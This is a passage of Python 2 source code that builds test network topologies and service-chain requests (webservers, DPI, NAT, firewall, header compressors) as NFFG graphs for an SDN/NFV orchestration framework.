l4.bandwidth = 1000
return nffg
def generate_sdn_topo2 ():
# Create NFFG
nffg = NFFG(id="SDN", name="SDN-Topology")
# Add MikroTik OF switches
mt1 = nffg.add_infra(id="MT1", name="MikroTik-SW-1", domain=DOMAIN_SDN,
infra_type=NFFG.TYPE_INFRA_SDN_SW)
mt1.resources.delay = 0.2
mt1.resources.bandwidth = 4000
# Add SAPs
sap14 = nffg.add_sap(id="SAP14", name="SAP14")
sap24 = nffg.add_sap(id="SAP24", name="SAP24")
sap34 = nffg.add_sap(id="SAP34", name="SAP34")
# Add links
l1 = nffg.add_link(sap14.add_port(1), mt1.add_port(1), id="sdn-link1")
l2 = nffg.add_link(sap24.add_port(1), mt1.add_port(2), id="sdn-link2")
l3 = nffg.add_link(sap34.add_port(1), mt1.add_port(3), id="sdn-link3")
l1.delay = 0.1
l1.bandwidth = 1000
l2.delay = 1.5
l2.bandwidth = 1000
l3.delay = 1.5
l3.bandwidth = 1000
return nffg
def generate_sdn_req ():
# Create NFFG
nffg = NFFG(id="SDN", name="SDN-Topology")
# Add SAPs
sap14 = nffg.add_sap(id="SAP14", name="SAP14")
sap24 = nffg.add_sap(id="SAP24", name="SAP24")
# sap34 = nffg.add_sap(id="SAP34", name="SAP34")
sap14.add_port(1)
sap24.add_port(1)
# sap34.add_port(1)
nffg.add_sglink(sap14.ports[1], sap24.ports[1], id=1)
# nffg.add_sglink(sap14.ports[1], sap34.ports[1])
# nffg.add_sglink(sap24.ports[1], sap14.ports[1])
# nffg.add_sglink(sap34.ports[1], sap14.ports[1])
nffg.add_req(sap14.ports[1], sap24.ports[1], bandwidth=10, delay=100, id=2)
# nffg.add_req(sap14.ports[1], sap34.ports[1], bandwidth=10, delay=100)
# nffg.add_req(sap24.ports[1], sap14.ports[1], bandwidth=10, delay=100)
# nffg.add_req(sap34.ports[1], sap14.ports[1], bandwidth=10, delay=100)
return nffg
def generate_os_req ():
test = NFFG(id="OS-req", name="SG-name")
sap1 = test.add_sap(name="SAP24", id="0")
sap2 = test.add_sap(name="SAP42", id="1")
webserver = test.add_nf(id="webserver", name="webserver",
func_type="webserver", cpu=1, mem=1, storage=0)
# echo = test.add_nf(id="echo", name="echo", func_type="echo",
# cpu=1, mem=1, storage=0)
test.add_sglink(sap1.add_port(0), webserver.add_port(0), id=1)
test.add_sglink(webserver.ports[0], sap2.add_port(0), id=2)
# test.add_req(sap1.ports[0], webserver.ports[0], bandwidth=1, delay=20)
# test.add_req(webserver.ports[0], sap2.ports[0], bandwidth=1, delay=20)
test.add_req(sap1.ports[0], sap2.ports[0], bandwidth=1, delay=100)
return test
def generate_os_mn_req ():
test = NFFG(id="OS-MN-req", name="SG-name")
sap1 = test.add_sap(name="SAP1", id="sap1")
sap2 = test.add_sap(name="SAP2", id="sap2")
# comp = test.add_nf(id="comp", name="COMPRESSOR",
# func_type="headerCompressor",
# cpu=1, mem=1, storage=0)
# decomp = test.add_nf(id="decomp", name="DECOMPRESSOR",
# func_type="headerDecompressor", cpu=1, mem=1,
# storage=0)
# fwd = test.add_nf(id="fwd", name="FORWARDER",
# func_type="simpleForwarder", cpu=1, mem=1, storage=0)
# sap14 = test.add_sap(name="SAP14", id="0")
# sap24 = test.add_sap(name="SAP24", id="1")
webserver = test.add_nf(id="webserver", name="webserver",
func_type="webserver", cpu=1, mem=1, storage=0)
# echo = test.add_nf(id="echo", name="echo", func_type="echo",
# cpu=1, mem=1, storage=0)
test.add_sglink(sap1.add_port(0), webserver.add_port(0), id=1)
test.add_sglink(webserver.ports[0], sap2.add_port(0), id=2)
# test.add_req(sap1.ports[0], webserver.ports[0], bandwidth=1, delay=20)
# test.add_req(webserver.ports[0], sap2.ports[0], bandwidth=1, delay=20)
test.add_req(sap1.ports[0], sap2.ports[0], bandwidth=1, delay=100)
return test
def generate_dov ():
# Create NFFG
nffg = NFFG(id="INTERNAL", name="SIGCOMM")
# Add environments
ee1 = nffg.add_infra(id="EE1", name="ee-infra-1", domain=DOMAIN_INTERNAL,
infra_type=NFFG.TYPE_INFRA_EE, cpu=5, mem=5, storage=5,
delay=0.9, bandwidth=5000)
ee2 = nffg.add_infra(id="EE2", name="ee-infra-2", domain=DOMAIN_INTERNAL,
infra_type=NFFG.TYPE_INFRA_EE, cpu=5, mem=5, storage=5,
delay=0.9, bandwidth=5000)
# Add supported types
ee1.add_supported_type(
('headerCompressor', 'headerDecompressor', 'simpleForwarder'))
ee2.add_supported_type(
('headerCompressor', 'headerDecompressor', 'simpleForwarder'))
# Add OVS switches
sw3 = nffg.add_infra(id="SW3", name="switch-3", domain=DOMAIN_INTERNAL,
infra_type=NFFG.TYPE_INFRA_SDN_SW, delay=0.2,
bandwidth=10000)
sw4 = nffg.add_infra(id="SW4", name="switch-4", domain=DOMAIN_INTERNAL,
infra_type=NFFG.TYPE_INFRA_SDN_SW, delay=0.2,
bandwidth=10000)
# Add SAPs
sap1 = nffg.add_sap(id="SAP1", name="SAP1")
sap2 = nffg.add_sap(id="SAP2", name="SAP2")
# Add links
link_res = {'delay': 1.5, 'bandwidth': 10}
nffg.add_link(ee1.add_port(1), sw3.add_port(1), id="link1", **link_res)
nffg.add_link(ee2.add_port(1), sw4.add_port(1), id="link2", **link_res)
nffg.add_link(sw3.add_port(2), sw4.add_port(2), id="link3", **link_res)
nffg.add_link(sw3.add_port(3), sap1.add_port(1), id="link4", **link_res)
nffg.add_link(sw4.add_port(3), sap2.add_port(1), id="link5", **link_res)
# Add MikroTik OF switches
mt1 = nffg.add_infra(id="MT1", name="MikroTik-SW-1", domain=DOMAIN_SDN,
infra_type=NFFG.TYPE_INFRA_SDN_SW)
mt2 = nffg.add_infra(id="MT2", name="MikroTik-SW-2", domain=DOMAIN_SDN,
infra_type=NFFG.TYPE_INFRA_SDN_SW)
mt1.resources.delay = 0.2
mt1.resources.bandwidth = 4000
mt2.resources.delay = 0.2
mt2.resources.bandwidth = 4000
# Add links
l11 = nffg.add_link(mt1.add_port(1), mt2.add_port(1), id="link11")
l12 = nffg.add_link(sw4.add_port(4), mt1.add_port(2), id="link12")
mt1.add_port(3)
mt1.add_port(4)
mt2.add_port(4)
l11.delay = 0.1
l11.bandwidth = 1000
l12.delay = 1.5
l12.bandwidth = 1000
os_bb = nffg.add_infra(id="UUID-01", name="Single BiSBiS in OS Domain",
domain="OPENSTACK",
infra_type=NFFG.TYPE_INFRA_BISBIS, cpu=10, mem=32,
storage=5, delay=0, bandwidth=100000)
# Add supported types
os_bb.add_supported_type(('webserver', 'echo'))
l21 = nffg.add_link(mt2.add_port(2), os_bb.add_port(0), id="link21")
l21.delay = 10
l21.bandwidth = 1000
un_bb = nffg.add_infra(id="UUID11", name="Universal Node",
domain="UN",
infra_type=NFFG.TYPE_INFRA_BISBIS, cpu=5, mem=16,
storage=5, delay=0, bandwidth=100000)
# Add supported types
un_bb.add_supported_type(('dpi', 'example'))
l31 = nffg.add_link(mt2.add_port(3), un_bb.add_port(1), id="link31")
l31.delay = 10
l31.bandwidth = 1000
nffg.duplicate_static_links()
return nffg
def generate_global_req ():
test = NFFG(id="SIGCOMM-demo-req", name="SIGCOMM-2web-1dpi-2SAP-req")
sap1 = test.add_sap(name="SAP1", id="sap1")
sap2 = test.add_sap(name="SAP2", id="sap2")
# comp = test.add_nf(id="comp", name="COMPRESSOR",
# func_type="headerCompressor",
# cpu=1, mem=1, storage=0)
# decomp = test.add_nf(id="decomp", name="DECOMPRESSOR",
# func_type="headerDecompressor", cpu=1, mem=1,
# storage=0)
# fwd = test.add_nf(id="fwd", name="FORWARDER",
# func_type="simpleForwarder", cpu=1, mem=1, storage=0)
webserver1 = test.add_nf(id="webserver1", name="webserver1",
func_type="webserver", cpu=1, mem=1, storage=0)
webserver2 = test.add_nf(id="webserver2", name="webserver2",
func_type="webserver", cpu=1, mem=1, storage=0)
dpi = test.add_nf(id="dpi", name="DPI", func_type="dpi", cpu=1, mem=1,
storage=0)
test.add_sglink(sap1.add_port(1), webserver1.add_port(0), id='11')
test.add_sglink(webserver1.ports[0], dpi.add_port(1), id='12')
test.add_sglink(dpi.add_port(2), sap1.ports[1], id='13')
test.add_sglink(sap2.add_port(1), webserver2.add_port(0), id='21')
test.add_sglink(webserver2.ports[0], sap2.ports[1], id='22')
test.add_req(sap1.ports[1], sap1.ports[1], bandwidth=1, delay=100,
sg_path=('11', '12', '13'))
test.add_req(sap2.ports[1], sap2.ports[1], bandwidth=1, delay=100,
sg_path=('21', '22'))
return test
def generate_ewsdn_req1 ():
test = NFFG(id="EWSDN-demo-req1", name="EWSDN-2web-2SAP-req")
sap1 = test.add_sap(name="SAP1", id="sap1")
sap2 = test.add_sap(name="SAP2", id="sap2")
webserver1 = test.add_nf(id="webserver1", name="webserver1",
func_type="webserver", cpu=1, mem=1, storage=0)
webserver2 = test.add_nf(id="webserver2", name="webserver2",
func_type="webserver", cpu=1, mem=1, storage=0)
test.add_sglink(sap1.add_port(1), webserver1.add_port(0), id='11')
test.add_sglink(webserver1.ports[0], sap1.ports[1], id='12')
test.add_sglink(sap2.add_port(1), webserver2.add_port(0), id='21')
test.add_sglink(webserver2.ports[0], sap2.ports[1], id='22')
test.add_req(sap1.ports[1], sap1.ports[1], bandwidth=1, delay=100,
sg_path=('11', '12'))
test.add_req(sap2.ports[1], sap2.ports[1], bandwidth=1, delay=100,
sg_path=('21', '22'))
return test
def generate_ewsdn_req2 ():
test = NFFG(id="EWSDN-demo-req2", name="EWSDN-2web-1dpi-2SAP-req")
sap1 = test.add_sap(name="SAP1", id="sap1")
sap2 = test.add_sap(name="SAP2", id="sap2")
# comp = test.add_nf(id="comp", name="COMPRESSOR",
# func_type="headerCompressor",
# cpu=1, mem=1, storage=0)
# decomp = test.add_nf(id="decomp", name="DECOMPRESSOR",
# func_type="headerDecompressor", cpu=1, mem=1,
# storage=0)
# fwd = test.add_nf(id="fwd", name="FORWARDER",
# func_type="simpleForwarder", cpu=1, mem=1, storage=0)
webserver1 = test.add_nf(id="webserver1", name="webserver1",
func_type="webserver", cpu=1, mem=1, storage=0)
webserver2 = test.add_nf(id="webserver2", name="webserver2",
func_type="webserver", cpu=1, mem=1, storage=0)
dpi = test.add_nf(id="dpi", name="DPI", func_type="dpi", cpu=1, mem=1,
storage=0)
test.add_sglink(sap1.add_port(1), webserver1.add_port(0), id='11')
test.add_sglink(webserver1.ports[0], dpi.add_port(1), id='12')
test.add_sglink(dpi.add_port(2), sap1.ports[1], id='13')
test.add_sglink(sap2.add_port(1), webserver2.add_port(0), id='21')
test.add_sglink(webserver2.ports[0], sap2.ports[1], id='22')
test.add_req(sap1.ports[1], sap1.ports[1], bandwidth=1, delay=100,
sg_path=('11', '12', '13'))
test.add_req(sap2.ports[1], sap2.ports[1], bandwidth=1, delay=100,
sg_path=('21', '22'))
return test
def generate_ewsdn_req3 ():
test = NFFG(id="EWSDN-demo-req3",
name="EWSDN-2web-1dpi-1comp-1decomp-2SAP-req")
sap1 = test.add_sap(name="SAP1", id="sap1")
sap2 = test.add_sap(name="SAP2", id="sap2")
comp = test.add_nf(id="comp", name="COMPRESSOR",
func_type="headerCompressor",
cpu=1, mem=1, storage=0)
decomp = test.add_nf(id="decomp", name="DECOMPRESSOR",
func_type="headerDecompressor", cpu=1, mem=1,
storage=0)
webserver1 = test.add_nf(id="webserver1", name="webserver1",
func_type="webserver", cpu=1, mem=1, storage=0)
webserver2 = test.add_nf(id="webserver2", name="webserver2",
func_type="webserver", cpu=1, mem=1, storage=0)
dpi = test.add_nf(id="dpi", name="DPI", func_type="dpi", cpu=1, mem=1,
storage=0)
test.add_sglink(sap1.add_port(1), webserver1.add_port(0), id='11')
test.add_sglink(webserver1.ports[0], dpi.add_port(1), id='12')
test.add_sglink(dpi.add_port(2), comp.add_port(1), id='13')
test.add_sglink(comp.ports[1], decomp.add_port(1), id='14')
test.add_sglink(decomp.ports[1], sap1.ports[1], id='15')
test.add_sglink(sap2.add_port(1), webserver2.add_port(0), id='21')
test.add_sglink(webserver2.ports[0], sap2.ports[1], id='22')
test.add_req(sap1.ports[1], sap1.ports[1], bandwidth=1, delay=100,
sg_path=('11', '12', '13', '14', '15'))
test.add_req(sap2.ports[1], sap2.ports[1], bandwidth=1, delay=100,
sg_path=('21', '22'))
return test
def test_conversion ():
from escape.util.conversion import NFFGConverter
with open("/home/czentye/escape/src/escape_v2/tools/os_domain.xml") as f:
os_nffg, os_virt = NFFGConverter(
domain="OPENSTACK").parse_from_Virtualizer(f.read(), with_virt=True)
with open("/home/czentye/escape/src/escape_v2/tools/un_domain.xml") as f:
un_nffg, un_virt = NFFGConverter(
domain="UN").parse_from_Virtualizer(f.read(), with_virt=True)
with open("/home/czentye/escape/src/escape_v2/pox/escape-mn-topo.nffg") as f:
internal = NFFG.parse(f.read())
internal.duplicate_static_links()
# print
# pprint(os_nffg.network.__dict__)
# print
# pprint(un_nffg.network.__dict__)
# print
# pprint(internal.network.__dict__)
merged = NFFGToolBox.merge_new_domain(internal, os_nffg)
merged = NFFGToolBox.merge_new_domain(merged, un_nffg)
# pprint(merged.network.__dict__)
print
splitted = NFFGToolBox.split_into_domains(merged)
print splitted
# for d, p in splitted:
# print "\n", d
# print p.dump()
os_virt.nodes['UUID-01'].clearData()
os_virt.nodes['UUID-01'].flowtable.clearData()
print
print str(os_virt)
os_splitted = [n for d, n in splitted if d == "OPENSTACK"][0]
os_splitted['UUID-01'].domain = "UN"
os_splitted['UUID-01'].ports[0].add_flowrule(match="in_port=0;TAG=42",
action="output=3;UNTAG")
os_splitted['UUID-01'].ports[2].add_flowrule(match="in_port=2;UNTAG",
action="output=1;TAG=24")
print os_splitted.dump()
def generate_merged_mapped ():
with open("/home/czentye/escape/src/escape_v2/pox/merged-global.nffg") as f:
nffg = NFFG.parse(f.read())
nffg.id = "test-mapped-web-dpi"
nffg.name = "Test-NFFG"
nf_dpi = nffg.add_nf(id="dpi", name="DPI", func_type="dpi")
nf_web = nffg.add_nf(id="webserver", name="Webserver", func_type="webserver")
nffg.add_undirected_link(port1=nf_dpi.add_port(1),
port2=nffg['UUID11'].add_port(111), dynamic=True)
nffg.add_undirected_link(port1=nf_dpi.add_port(2),
port2=nffg['UUID11'].add_port(222), dynamic=True)
nffg.add_undirected_link(port1=nf_web.add_port(0),
port2=nffg['UUID-01'].add_port(100), dynamic=True)
nffg.add_undirected_link(port1=nf_web.add_port(1),
port2=nffg['UUID-01'].add_port(111), dynamic=True)
# UN domain flowrules
nffg['UUID11'].ports[1].add_flowrule("in_port=1;TAG=4242", "output=111;UNTAG")
nffg['UUID11'].ports[222].add_flowrule("in_port=222", "output=1;TAG=2424")
# OS domain flowrules
nffg['UUID-01'].ports[0].add_flowrule("in_port=0;TAG=1313",
"output=100;UNTAG")
nffg['UUID-01'].ports[111].add_flowrule("in_port=111", "output=0;TAG=3131")
return nffg.dump()
def generate_simple_test_topo ():
# Create NFFG
nffg = NFFG(id="TEST", name="Simple-Test-Topology")
# Add environments
ee1 = nffg.add_infra(id="EE1", name="ee-infra-1", domain=DOMAIN_INTERNAL,
infra_type=NFFG.TYPE_INFRA_EE, cpu=5, mem=5, storage=5,
delay=0.9, bandwidth=5000)
# Add supported types
ee1.add_supported_type(
('headerCompressor', 'headerDecompressor', 'simpleForwarder', 'ovs'))
# Add SAPs
sap1 = nffg.add_sap(id="SAP1", name="SAP1")
sap2 = nffg.add_sap(id="SAP2", name="SAP2")
# Add links
link_res = {'delay': 1.5, 'bandwidth': 10}
nffg.add_link(sap1.add_port(1), ee1.add_port(1), id="mn-link1", **link_res)
nffg.add_link(sap2.add_port(1), ee1.add_port(2), id="mn-link2", **link_res)
# nffg.duplicate_static_links()
return nffg
def generate_simple_test_req ():
test = NFFG(id="Simple-test-req", name="Simple test request")
sap1 = test.add_sap(name="SAP1", id="sap1")
sap2 = test.add_sap(name="SAP2", id="sap2")
ovs = test.add_nf(id="ovs", name="OVS switch", func_type="ovs",
cpu=1, mem=1, storage=0)
test.add_sglink(sap1.add_port(1), ovs.add_port(1), id=1)
test.add_sglink(ovs.ports[1], sap2.add_port(1), id=2)
test.add_req(sap1.ports[1], sap2.ports[1], bandwidth=1, delay=10,
sg_path=(1, 2))
return test
def generate_hwloc2nffg_test_req ():
test = NFFG(id="Dataplane-req", name="Dataplane-req")
wlan0 = test.add_sap(name="wlan0", id="wlan0")
eth0 = test.add_sap(name="eth0", id="eth0")
decomp = test.add_nf(id="decomp", name="DECOMPRESSOR",
func_type="headerDecompressor", cpu=1, mem=1, storage=0)
# wlan0 --> decomp --> eth0 --> wlan0
test.add_sglink(wlan0.add_port(38), decomp.add_port(1), id=1)
test.add_sglink(decomp.ports[1], eth0.add_port(34), id=2)
test.add_sglink(eth0.ports[34], wlan0.ports[38], id=3)
test.add_req(wlan0.ports[38], eth0.ports[34], bandwidth=50, delay=100,
sg_path=(1, 2))
test.add_req(eth0.ports[34], wlan0.ports[38], bandwidth=50, delay=100,
sg_path=(3,))
return test
def generate_5gex_req0 ():
test = NFFG(id="SG-1", name="SG-name1")
sap1 = test.add_sap(name="SAP1", id="sap1")
sap2 = test.add_sap(name="SAP2", id="sap2")
test.add_sglink(sap1.add_port(1), sap2.add_port(1), id=1)
test.add_sglink(sap1.ports[1], sap2.ports[1], id=2)
test.add_req(sap1.ports[1], sap2.ports[1], bandwidth=4, delay=20,
sg_path=(1, 2))
return test
def generate_5gex_req1 ():
test = NFFG(id="SG-1", name="SG-name1")
sap1 = test.add_sap(name="SAP1", id="sap1")
sap2 = test.add_sap(name="SAP2", id="sap2")
bridge = test.add_nf(id="bridge", name="BRIDGE", func_type="bridge",
cpu=1, mem=1, storage=0)
fwd = test.add_nf(id="fwd", name="FORWARDER", func_type="simpleForwarder",
cpu=1, mem=1, storage=0)
test.add_sglink(sap1.add_port(1), bridge.add_port(1), id=1)
test.add_sglink(bridge.add_port(2), sap2.add_port(1), id=2)
test.add_sglink(sap2.ports[1], fwd.add_port(1), id=3)
test.add_sglink(fwd.ports[1], sap1.ports[1], id=4)
test.add_req(sap1.ports[1], sap2.ports[1], bandwidth=4, delay=20,
sg_path=(1, 2))
test.add_req(sap2.ports[1], sap1.ports[1], bandwidth=4, delay=20,
sg_path=(3, 4))
return test
def generate_5gex_req2 ():
test = NFFG(id="SG-2", name="SG-name2")
sap1 = test.add_sap(name="SAP1", id="sap1")
sap2 = test.add_sap(name="SAP2", id="sap2")
comp = test.add_nf(id="comp", name="COMPRESSOR", func_type="headerCompressor",
cpu=1, mem=1, storage=0)
decomp = test.add_nf(id="decomp", name="DECOMPRESSOR",
func_type="headerDecompressor", cpu=1, mem=1, storage=0)
fwd = test.add_nf(id="fwd", name="FORWARDER", func_type="simpleForwarder",
cpu=1, mem=1, storage=0)
test.add_sglink(sap1.add_port(1), comp.add_port(1), id=1)
test.add_sglink(comp.ports[1], decomp.add_port(1), id=2)
test.add_sglink(decomp.ports[1], sap2.add_port(1), id=3)
test.add_sglink(sap2.ports[1], fwd.add_port(1), id=4)
test.add_sglink(fwd.ports[1], sap1.ports[1], id=5)
test.add_req(sap1.ports[1], sap2.ports[1], bandwidth=4, delay=20,
sg_path=(1, 2, 3))
test.add_req(sap2.ports[1], sap1.ports[1], bandwidth=4, delay=20,
sg_path=(4, 5))
return test
def generate_req_verification ():
test = NFFG(id="verification-2sap-web-fw-dpi-nat",
name="verification-2sap-web-fw-dpi-nat")
sap1 = test.add_sap(name="SAP1", id="sap1")
sap2 = test.add_sap(name="SAP2", id="sap2")
sap3 = test.add_sap(name="SAP3", id="sap3")
webserver1 = test.add_nf(id="webserver1", name="webserver1",
func_type="webserver", cpu=1, mem=1, storage=0)
nat = test.add_nf(id="nat", name="NAT", func_type="nat",
cpu=1, mem=1, storage=0)
fw = test.add_nf(id="fw", name="FIREWALL", func_type="firewall",
cpu=1, mem=1, storage=0)
dpi = test.add_nf(id="dpi", name="DPI", func_type="dpi",
cpu=1, mem=1, storage=0)
test.add_sglink(sap1.add_port(1), nat.add_port(1), id=11)
test.add_sglink(nat.add_port(2), webserver1.add_port(1), id=12)
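# Note (added for readability): 'flowclass' here and below restricts an SG
# link to traffic matching the given OpenFlow-style fields, so alternative
# branches of the chain can share the same NF ports (e.g. only packets
# destined to 172.16.58.3 take link 13).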
test.add_sglink(webserver1.ports[1], fw.add_port(1), id=13,
flowclass='dl_type=0x0800,nw_dst=172.16.58.3')
test.add_sglink(fw.add_port(2), nat.ports[2], id=14)
test.add_sglink(nat.ports[1], sap1.ports[1], id=15,
flowclass='dl_type=0x0800,nw_dst=10.0.0.1')
test.add_sglink(sap2.add_port(1), nat.ports[1], id=21)
test.add_sglink(nat.ports[1], dpi.add_port(1), id=25,
flowclass='dl_type=0x0800,nw_dst=10.0.0.2')
test.add_sglink(dpi.add_port(2), sap2.ports[1], id=26)
test.add_sglink(sap3.add_port(1), webserver1.ports[1], id=31)
test.add_sglink(webserver1.ports[1], sap3.ports[1], id=32,
flowclass='dl_type=0x0800,nw_dst=192.168.3.11')
test.add_req(sap1.ports[1], sap1.ports[1], bandwidth=1, delay=100,
sg_path=(11, 12, 13, 14, 15))
# test.add_req(sap2.ports[1], sap2.ports[1], bandwidth=1, delay=100,
# sg_path=(21, 22, 14, 23))
return test
def generate_etsi_req1a ():
test = NFFG(id="ETSI-1sap-web", name="ETSI-1sap-web")
sap1 = test.add_sap(name="SAP1", id="SAP1")
webserver1 = test.add_nf(id="webserver1", name="webserver1",
func_type="webserver", cpu=1, mem=1, storage=0)
test.add_sglink(sap1.add_port(1), webserver1.add_port(0), id=11)
test.add_sglink(webserver1.ports[0], sap1.ports[1], id=12,
flowclass='dl_dst=00:00:00:00:00:01')
test.add_req(sap1.ports[1], sap1.ports[1], bandwidth=1, delay=100,
sg_path=(11, 12))
return test
def generate_etsi_req1b ():
test = NFFG(id="ETSI-2sap-web", name="ETSI-2sap-web")
sap1 = test.add_sap(name="SAP1", id="SAP1")
sap2 = test.add_sap(name="SAP2", id="SAP2")
webserver1 = test.add_nf(id="webserver1", name="webserver1",
func_type="webserver", cpu=1, mem=1, storage=0)
test.add_sglink(sap1.add_port(1), webserver1.add_port(0), id=11)
test.add_sglink(webserver1.ports[0], sap1.ports[1], id=12,
flowclass='dl_dst=00:00:00:00:00:01')
test.add_sglink(sap2.add_port(1), webserver1.ports[0], id=21)
test.add_sglink(webserver1.ports[0], sap2.ports[1], id=22,
flowclass='dl_dst=00:00:00:00:00:02')
test.add_req(sap1.ports[1], sap1.ports[1], bandwidth=1, delay=100,
sg_path=(11, 12))
return test
def generate_etsi_req2a ():
test = NFFG(id="ETSI-1sap-web-dpi", name="ETSI-1sap-web-dpi")
sap1 = test.add_sap(name="SAP1", id="SAP1")
webserver1 = test.add_nf(id="webserver1", name="webserver1",
func_type="webserver", cpu=1, mem=1, storage=0)
dpi = test.add_nf(id="dpi", name="DPI", func_type="dpi", cpu=1, mem=1,
storage=0)
test.add_sglink(sap1.add_port(1), webserver1.add_port(0), id=11)
test.add_sglink(webserver1.ports[0], dpi.add_port(1), id=12,
flowclass='dl_dst=00:00:00:00:00:01')
test.add_sglink(dpi.add_port(2), sap1.ports[1], id=13)
test.add_req(sap1.ports[1], sap1.ports[1], bandwidth=1, delay=100,
sg_path=(11, 12, 13))
return test
def generate_etsi_req2b ():
test = NFFG(id="ETSI-2sap-web-dpi", name="ETSI-2sap-web-dpi")
sap1 = test.add_sap(name="SAP1", id="SAP1")
sap2 = test.add_sap(name="SAP2", id="SAP2")
webserver1 = test.add_nf(id="webserver1", name="webserver1",
func_type="webserver", cpu=1, mem=1, storage=0)
dpi = test.add_nf(id="dpi", name="DPI", func_type="dpi", cpu=1, mem=1,
storage=0)
# fwd = test.add_nf(id="fwd", name="FORWARDER", func_type="simpleForwarder",
# cpu=1, mem=1, storage=0)
test.add_sglink(sap1.add_port(1), webserver1.add_port(0), id=11)
test.add_sglink(webserver1.ports[0], dpi.add_port(1), id=12,
flowclass='dl_dst=00:00:00:00:00:01')
test.add_sglink(dpi.add_port(2), sap1.ports[1], id=13)
# test.add_sglink(sap2.add_port(1), fwd.add_port(1), id=21)
# test.add_sglink(fwd.ports[1], webserver1.ports[0], id=22)
# test.add_sglink(webserver1.ports[0], sap2.ports[1], id=23,
# flowclass='dl_dst=00:00:00:00:00:02')
test.add_sglink(sap2.add_port(1), webserver1.ports[0], id=21)
test.add_sglink(webserver1.ports[0], sap2.ports[1], id=22,
flowclass='dl_dst=00:00:00:00:00:02')
test.add_req(sap1.ports[1], sap1.ports[1], bandwidth=1, delay=100,
sg_path=(11, 12, 13))
test.add_req(sap2.ports[1], sap2.ports[1], bandwidth=1, delay=100,
sg_path=(21, 22))
return test
def generate_etsi_req3a ():
test = NFFG(id="ETSI-1sap-web-dpi-comp-decomp",
name="ETSI-1sap-web-dpi-comp-decomp")
sap1 = test.add_sap(name="SAP1", id="sap1")
comp = test.add_nf(id="comp", name="COMPRESSOR",
func_type="headerCompressor",
cpu=1, mem=1, storage=0)
decomp = test.add_nf(id="decomp", name="DECOMPRESSOR",
func_type="headerDecompressor", cpu=1, mem=1,
storage=0)
webserver1 = test.add_nf(id="webserver1", name="webserver1",
func_type="webserver", cpu=1, mem=1, storage=0)
dpi = test.add_nf(id="dpi", name="DPI", func_type="dpi", cpu=1, mem=1,
storage=0)
test.add_sglink(sap1.add_port(1), webserver1.add_port(0), id=11)
test.add_sglink(webserver1.ports[0], dpi.add_port(1), id=12,
flowclass='dl_dst=00:00:00:00:00:01')
test.add_sglink(dpi.add_port(2), comp.add_port(1), id=13)
test.add_sglink(comp.ports[1], decomp.add_port(1), id=14)
test.add_sglink(decomp.ports[1], sap1.ports[1], id=15)
test.add_req(sap1.ports[1], sap1.ports[1], bandwidth=1, delay=100,
sg_path=(11, 12, 13, 14, 15))
return test
def generate_etsi_req3b ():
test = NFFG(id="ETSI-2sap-web-dpi-comp-decomp",
name="ETSI-2sap-web-dpi-comp-decomp")
sap1 = test.add_sap(name="SAP1", id="sap1")
sap2 = test.add_sap(name="SAP2", id="sap2")
comp = test.add_nf(id="comp", name="COMPRESSOR",
func_type="headerCompressor",
cpu=1, mem=1, storage=0)
decomp = test.add_nf(id="decomp", name="DECOMPRESSOR",
func_type="headerDecompressor", cpu=1, mem=1,
storage=0)
webserver1 = test.add_nf(id="webserver1", name="webserver1",
func_type="webserver", cpu=1, mem=1, storage=0)
dpi = test.add_nf(id="dpi", name="DPI", func_type="dpi", cpu=1, mem=1,
storage=0)
test.add_sglink(sap1.add_port(1), webserver1.add_port(0), id=11)
test.add_sglink(webserver1.ports[0], dpi.add_port(1), id=12,
flowclass='dl_dst=00:00:00:00:00:01')
test.add_sglink(dpi.add_port(2), comp.add_port(1), id=13)
test.add_sglink(comp.ports[1], decomp.add_port(1), id=14)
test.add_sglink(decomp.ports[1], sap1.ports[1], id=15,
flowclass='dl_type=0x0800,nw_dst=10.0.0.1')
test.add_sglink(sap2.add_port(1), webserver1.ports[0], id=21)
test.add_sglink(webserver1.ports[0], comp.ports[1], id=22,
flowclass='dl_dst=00:00:00:00:00:02')
test.add_sglink(decomp.ports[1], sap2.ports[1], id=23,
flowclass='dl_type=0x0800,nw_dst=10.0.0.2')
test.add_req(sap1.ports[1], sap1.ports[1], bandwidth=1, delay=100,
sg_path=(11, 12, 13, 14, 15))
# test.add_req(sap2.ports[1], sap2.ports[1], bandwidth=1, delay=100,
# sg_path=(21, 22, 14, 23))
return test
def generate_etsi_req3b2 ():
test = NFFG(id="ETSI-2sap-web-dpi-comp-decomp-onlysap1",
name="ETSI-2sap-web-dpi-comp-decomp-onlysap1")
sap1 = test.add_sap(name="SAP1", id="sap1")
sap2 = test.add_sap(name="SAP2", id="sap2")
comp = test.add_nf(id="comp", name="COMPRESSOR",
func_type="headerCompressor",
cpu=1, mem=1, storage=0)
decomp = test.add_nf(id="decomp", name="DECOMPRESSOR",
func_type="headerDecompressor", cpu=1, mem=1,
storage=0)
webserver1 = test.add_nf(id="webserver1", name="webserver1",
func_type="webserver", cpu=1, mem=1, storage=0)
dpi = test.add_nf(id="dpi", name="DPI", func_type="dpi", cpu=1, mem=1,
storage=0)
test.add_sglink(sap1.add_port(1), webserver1.add_port(0), id=11)
test.add_sglink(webserver1.ports[0], dpi.add_port(1), id=12,
flowclass='dl_dst=00:00:00:00:00:01')
test.add_sglink(dpi.add_port(2), comp.add_port(1), id=13)
test.add_sglink(comp.ports[1], decomp.add_port(1), id=14)
test.add_sglink(decomp.ports[1], sap1.ports[1], id=15)
test.add_sglink(sap2.add_port(1), webserver1.ports[0], id=21)
test.add_sglink(webserver1.ports[0], sap2.ports[1], id=22,
flowclass='dl_dst=00:00:00:00:00:02')
test.add_req(sap1.ports[1], sap1.ports[1], bandwidth=1, delay=100,
sg_path=(11, 12, 13, 14, 15))
# test.add_req(sap2.ports[1], sap2.ports[1], bandwidth=1, delay=100,
# sg_path=(21, 22, 14, 23))
return test
def generate_etsi_req4b2a ():
test = NFFG(id="ETSI-2sap-web-dpi-bridge-comp-decomp-onlysap1",
name="ETSI-2sap-web-dpi-bridge-comp-decomp-onlysap1")
sap1 = test.add_sap(name="SAP1", id="sap1")
sap2 = test.add_sap(name="SAP2", id="sap2")
comp = test.add_nf(id="comp", name="COMPRESSOR",
func_type="headerCompressor",
cpu=1, mem=1, storage=0)
decomp = test.add_nf(id="decomp", name="DECOMPRESSOR",
func_type="headerDecompressor", cpu=1, mem=1,
storage=0)
webserver1 = test.add_nf(id="webserver1", name="webserver1",
func_type="webserver", cpu=1, mem=1, storage=0)
dpi = test.add_nf(id="dpi", name="DPI", func_type="dpi", cpu=1, mem=1,
storage=0)
bridge = test.add_nf(id="dockernf", name="dockernf", func_type="bridge",
cpu=1, mem=1,
storage=0)
